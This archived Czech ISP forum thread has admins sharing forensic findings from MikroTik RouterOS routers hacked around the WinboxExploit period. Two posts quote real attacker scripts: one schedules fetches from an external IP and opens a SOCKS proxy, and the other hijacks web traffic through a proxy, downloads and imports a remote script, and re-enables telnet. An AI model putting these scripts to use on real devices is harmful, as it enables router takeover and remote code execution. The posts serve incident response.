❗️Toto je původní verze internetového fóra ISPforum.cz do února 2020 bez možnosti registrace nových uživatelů. Aktivní verzi fóra naleznete na adrese https://telekomunikace.cz
Výpadek hkfree
Re: Výpadek hkfree
Zdravím, prosím Vás existuje nějaká možnost vytáhnout nastavení z hacklé RB3011? Kdyžtak SZ. Předem díky
0 x
Citace: Ubiquiti jsou produkty pro lidi, kteří neumí a nerozumí sítím a chtějí aby “vše na jeden klik fungovalo”. Pokud po Ubiquiti produktech chceme obecně něco více, je to opravdu ZLO. Navíc tupé zlo, jen je designově hezké.
-
Dalibor Toman
- Příspěvky: 1246
- Registrován: 12 years ago
Dr.Easy píše:problém reportován mikrotiku. Podle všeho na svědomí mohou to mohou mít routerboardy, které mají disablovaného uživatele admin.
pokud je disablovaný, je tam šance, že se skrz admin heslo do mikrotiku lze dostat.
- vše ve stádiu zjišťování, ale vypadá to na další díru v RouterOS.
jako napad to neni spatne. Zvlaste vzhledem k tomu, ze soubor s databazi uzivatelu obsahuje i smazane uzivatele. Winbox zobrazi jen nektere ale databaze (stazena WinboxExpoloitem) jich obsahuje vic, pripadne se admin nekolikrat opakuje. Na druhou stranu ale smazani/neaktivni uzivatele maji zrejme prazdne heslo, takze to asi jednoduse zneuzitelne nebude.
Dr.Easy píše:bohužel, to jak teď vyhořeli jim na pracovní morálce a rychlosti moc nepřidává.
vyvojarum by to mohlo byt v celku sumak, ne? Navic kdyz vedeni prohlasilo, ze to pojistovna zacvaka, tak se nemuseji bat o vyplatu.
0 x
podle všeho to heslo stále obsahuje, ale je pouze disablované. není přepsané nebo smazané...
víc nevíme, uvidíme co se podaří zjistit...
víc nevíme, uvidíme co se podaří zjistit...
0 x
UBNT? Maximálně pro klienty...
Dovolím si zde napsat pár naších poznatků k nabouranému RouterOS na naší bráně:
Stav:
1) Verze 6.42.6CHR (ESXi v6.5u1)
2) Uživatele admin, root atd... smazání. Uživatelé jsou kombinací: Ab1, hesla: Ab1# (8-12 znaků)
3) Adekvátně ošetřený FW (drop listy, logování, přesměrování portů adt...)
4) Services vše až na WinBox vypnuté. Winbox BYL (už není) dostupný z internetu!!! ANO, naše chyba.
Zjištěno:
1) Odstraněno logování a uklizeno (i smazané všechny logy z HDD)
2) Napaden jen jeden účet, heslo nezměněno, daný účet byl ve výpisu jako první *
3) vytvořený Bridge a do něj přidané všechny "fyzické" Ethernety, VLAN se to nedotklo (ESXi umí ochranu před síťovou smyčkou, takže vše fungovalo).
4) Přidan plán v Scheduleru:
5) Přidaný Script:
6) nastaveno IP Socks:
- Žádné další změny jsme zatím nenašly.
- Do věcí kolem IPv6 nebylo jakkoliv zasaženo.
- Žádné další zařízení, na vnitřní adrese, za tímto MK nebylo napadeno. (zkontrolováno několik desítek zařízení)
*Daný účet neměl naštěstí všechny potřebné práva, to nás asi zachránilo.
Stav:
1) Verze 6.42.6CHR (ESXi v6.5u1)
2) Uživatele admin, root atd... smazání. Uživatelé jsou kombinací: Ab1, hesla: Ab1# (8-12 znaků)
3) Adekvátně ošetřený FW (drop listy, logování, přesměrování portů adt...)
4) Services vše až na WinBox vypnuté. Winbox BYL (už není) dostupný z internetu!!! ANO, naše chyba.
Zjištěno:
1) Odstraněno logování a uklizeno (i smazané všechny logy z HDD)
2) Napaden jen jeden účet, heslo nezměněno, daný účet byl ve výpisu jako první *
3) vytvořený Bridge a do něj přidané všechny "fyzické" Ethernety, VLAN se to nedotklo (ESXi umí ochranu před síťovou smyčkou, takže vše fungovalo).
4) Přidan plán v Scheduleru:
Kód: Vybrat vše
add interval=30s name=schedule4_ on-event=script4_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup5) Přidaný Script:
Kód: Vybrat vše
name=script4_ owner="napadený účet" policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
ddress=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http keep-resu\
lt=no"6) nastaveno IP Socks:
Kód: Vybrat vše
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25- Žádné další změny jsme zatím nenašly.
- Do věcí kolem IPv6 nebylo jakkoliv zasaženo.
- Žádné další zařízení, na vnitřní adrese, za tímto MK nebylo napadeno. (zkontrolováno několik desítek zařízení)
*Daný účet neměl naštěstí všechny potřebné práva, to nás asi zachránilo.
1 x
Síť není jen internet ...
-
Dalibor Toman
- Příspěvky: 1246
- Registrován: 12 years ago
6.42.6 by mela byt pred WinboxExploitem v bezpeci. Dokud se nepotvrdi opak, tak musime predpokladat,ze utocnik znal jmeno uctu a heslo. Bud ho uhodl nebo ho spis znal z jineho boxu nebo ze stejneho z doby, kdy tam byla napadnutelna verze.
Pokud to bylo na virtualu, tak by se mozna dalo zmenene heslo zjistit precteni filu s virtualnim HD (hledat jmeno uzivatele apod) a pomoci zverejnenych utilit dekodovat heslo (nebo ho prepsat). Nebo se vratit k nejake zaloze obsahu toho virtualniho disku.
Jinak to co popisujes vypada jako celkem bezna variant infekce nastavujici SOCKS
prave pry radi nejake nove pokusy o utoky v EU prostoru: https://forum.mikrotik.com/viewtopic.php?f=2&t=138517
Pokud to bylo na virtualu, tak by se mozna dalo zmenene heslo zjistit precteni filu s virtualnim HD (hledat jmeno uzivatele apod) a pomoci zverejnenych utilit dekodovat heslo (nebo ho prepsat). Nebo se vratit k nejake zaloze obsahu toho virtualniho disku.
Jinak to co popisujes vypada jako celkem bezna variant infekce nastavujici SOCKS
prave pry radi nejake nove pokusy o utoky v EU prostoru: https://forum.mikrotik.com/viewtopic.php?f=2&t=138517
0 x
Bylo tam stejné jméno+heslo i se staršími verzemi? Někdo ho mohl získat a nepoužít dříve a teď jen využil svoji starou databázi.
0 x
Ahoj,
mám podobné zkušenosti. Napadeno pár strojů, ale škody nulové, měli jsme tu dva typy, jeden skapal na právech a nestihnul zamést hlavní script, z toho se dá vyčíst obrana, třeba někomu pomůže :
/ip dns set servers=8.8.8.8
/ip proxy set enabled=yes
/ip proxy access add action=deny disabled=no
/ip firewall nat remove [find comment=sysadminpxy]
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter remove [find comment=sysadminpxy]
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html
/ip dns set servers=8.8.8.8
/ip service set www disabled=yes port=80
/ip service set telnet disabled=no port=2300
/ip service set winbox disabled=no port=8291
:delay 3s
/system scheduler add name="udpll3" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll4" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll5" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/u113.exe mode=http dst-path=u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll6" interval=1.01h start-time=startup on-event="/import u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/ip cloud set ddns-enabled=yes
/file remove u113.rsc
Další byl sofistikovanější, ale také neprošel mrzák naštěstí na další stroje:
mám podobné zkušenosti. Napadeno pár strojů, ale škody nulové, měli jsme tu dva typy, jeden skapal na právech a nestihnul zamést hlavní script, z toho se dá vyčíst obrana, třeba někomu pomůže :
/ip dns set servers=8.8.8.8
/ip proxy set enabled=yes
/ip proxy access add action=deny disabled=no
/ip firewall nat remove [find comment=sysadminpxy]
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter remove [find comment=sysadminpxy]
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html
/ip dns set servers=8.8.8.8
/ip service set www disabled=yes port=80
/ip service set telnet disabled=no port=2300
/ip service set winbox disabled=no port=8291
:delay 3s
/system scheduler add name="udpll3" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll4" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll5" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/u113.exe mode=http dst-path=u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll6" interval=1.01h start-time=startup on-event="/import u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/ip cloud set ddns-enabled=yes
/file remove u113.rsc
Další byl sofistikovanější, ale také neprošel mrzák naštěstí na další stroje:
- aa.png (124.31 KiB) Zobrazeno 4582 x
- bb.png (95.38 KiB) Zobrazeno 4582 x
0 x
Správa ESXi není dostupná z internetu. Je na samostatné FYZICKÉ síťové kartě (s povoleným vnitřním segmentem IP), která je dostupná jen z fyzické vnitřní sítě. Na síťových kartách, které slouží pro MK a další VM je zablokovaná správa ESXi.
S těmi staršími databázemi uživatelů a hesel to nemůžu vyloučit. Dlouho dobu tam byla verze 6.40.8-9 BugFix (teď už si nejsem jistý jestli x.8 nebo x.9). Po internetovém haló s napadením MK jsme vše na páteři aktualizovali na verzi 6.42.6 (6.42.7 ještě nebyla).
S těmi staršími databázemi uživatelů a hesel to nemůžu vyloučit. Dlouho dobu tam byla verze 6.40.8-9 BugFix (teď už si nejsem jistý jestli x.8 nebo x.9). Po internetovém haló s napadením MK jsme vše na páteři aktualizovali na verzi 6.42.6 (6.42.7 ještě nebyla).
0 x
Síť není jen internet ...
-
Dalibor Toman
- Příspěvky: 1246
- Registrován: 12 years ago
ikk píše:Správa ESXi není dostupná z internetu. Je na samostatné FYZICKÉ síťové kartě (s povoleným vnitřním segmentem IP), která je dostupná jen z fyzické vnitřní sítě. Na síťových kartách, které slouží pro MK a další VM je zablokovaná správa ESXi.
S těmi staršími databázemi uživatelů a hesel to nemůžu vyloučit. Dlouho dobu tam byla verze 6.40.8-9 BugFix (teď už si nejsem jistý jestli x.8 nebo x.9). Po internetovém haló s napadením MK jsme vše na páteři aktualizovali na verzi 6.42.6 (6.42.7 ještě nebyla).
6.40.8 ani 6.40.9 neni Winboxexploitem hacknutelna. hesla musely uniknout jeste ze starsich verzi.
0 x
Dalibor Toman píše:
6.40.8 ani 6.40.9 neni Winboxexploitem hacknutelna. hesla musely uniknout jeste ze starsich verzi.
Je to možné, nemůžu to vyloučit. Ale potom ta databáze už je docela stará... K aktualizacím brány přistupujeme konzervativněji (nejdenou jsme nechtěně dělali betatestery). Klienty aktualizujeme průběžně 1x měsíčně z našeho FTP (pomocí Schdeleru).
Takže rada všem: Změňte si na páteři hesla! Možná budete klidněji spát (bez záruky).
0 x
Síť není jen internet ...
tak Vám nevím, v pondělí nasazen nový x86 router, verze 6.42.6, v noci na dnešek jsem přišel o přístup na tu mašinu, v services byl jen SSH a winbox, porty změněny, firewall taky nakonfigurován, admin, a nové heslo, silné, zatím to dělá co má jen SSH i winbox jsou neaktivní, jede telnet, ale evidentně je tam jiné heslo, v noci ho nahradím CCRkem, vyměním v té mašině SSD a znova nainstaluju, z toho původního SSD půjde něco zkoumat??? díky
0 x
udělej image a pošli na support.
0 x
Jelikož je zde zakázáno se negativně vyjadřovat k provozním záležitostem, tak se holt musím vyjádřit takto: nové fórum tak jak je připravováno považuji za cestu do pekel. Nepřehledný maglajz z toho bude. Do podpisu se mi pozitiva již nevejdou.
Nejdříve z původního SSD udělat image. Následně to namountovat, je tam tuším ext3 a pak lousknout přez mtpass hesla...
0 x
Vysoce odborných omylů se dopouští jen specialisté.
Jednou jsem se dotkl ukazováčkem UBNT a slezl mi z něho nehet. Od té doby na UBNT nesahám.
Jednou jsem se dotkl ukazováčkem UBNT a slezl mi z něho nehet. Od té doby na UBNT nesahám.
Peyrak píše:tak Vám nevím, v pondělí nasazen nový x86 router, verze 6.42.6, v noci na dnešek jsem přišel o přístup na tu mašinu, v services byl jen SSH a winbox, porty změněny, firewall taky nakonfigurován, admin, a nové heslo, silné, zatím to dělá co má jen SSH i winbox jsou neaktivní, jede telnet, ale evidentně je tam jiné heslo, v noci ho nahradím CCRkem, vyměním v té mašině SSD a znova nainstaluju, z toho původního SSD půjde něco zkoumat??? díky
Jaktože jede telnet když jsi ho měl neaktivní?
0 x